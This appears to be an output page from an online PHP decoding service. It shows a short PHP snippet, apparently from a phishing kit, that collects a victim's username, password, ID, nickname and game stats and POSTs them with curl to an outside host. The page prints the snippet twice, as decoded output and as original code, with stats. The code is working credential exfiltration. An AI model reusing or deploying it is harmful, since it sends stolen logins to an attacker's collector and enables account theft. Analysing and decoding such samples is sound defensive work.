Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $myData = "user=".$user. "&pass=".$pass. "&id=".$id. "&nick=".$nick. "&le..

Decoded Output download

<?php 
 
 
$myData =  
"user=".$user. 
"&pass=".$pass. 
"&id=".$id. 
"&nick=".$nick. 
"&level=".$level. 
"&tier=".$tier. 
"&ep=".$ep. 
"&hp=".$hp. 
$myUrl  = "https://sanzseo.my.id/api/api.php"; 
 
$c4 = curl_init(); 
curl_setopt($c4, CURLOPT_URL, $myUrl); 
curl_setopt($c4, CURLOPT_POST, 1); 
curl_setopt($c4, CURLOPT_POSTFIELDS, $myData); 
curl_setopt($c4, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($c4, CURLOPT_COOKIEJAR, getcwd()."/jancok.txt"); 
curl_setopt($c4, CURLOPT_COOKIEFILE, getcwd()."/jancok.txt");    
curl_setopt($c4, CURLOPT_HEADER, 0); 
curl_setopt($c4, CURLOPT_FOLLOWLOCATION, 0); 
curl_exec($c4); 
curl_close($c4); 
 
 
?>

Did this file decode correctly?

Original Code

<?php


$myData = 
"user=".$user.
"&pass=".$pass.
"&id=".$id.
"&nick=".$nick.
"&level=".$level.
"&tier=".$tier.
"&ep=".$ep.
"&hp=".$hp.
$myUrl  = "https://sanzseo.my.id/api/api.php";

$c4 = curl_init();
curl_setopt($c4, CURLOPT_URL, $myUrl);
curl_setopt($c4, CURLOPT_POST, 1);
curl_setopt($c4, CURLOPT_POSTFIELDS, $myData);
curl_setopt($c4, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($c4, CURLOPT_COOKIEJAR, getcwd()."/jancok.txt");
curl_setopt($c4, CURLOPT_COOKIEFILE, getcwd()."/jancok.txt");   
curl_setopt($c4, CURLOPT_HEADER, 0);
curl_setopt($c4, CURLOPT_FOLLOWLOCATION, 0);
curl_exec($c4);
curl_close($c4);


?>

Function Calls

curl_init 1

Variables

$myUrl https://sanzseo.my.id/api/api.php
$myData user=0&pass=0&id=0&nick=0&level=0&tier=0&ep=0&hp=0https://sa..

Stats

MD5 38ccda1eb3765e0d73df144694d87eff
Eval Count 0
Decode Time 68 ms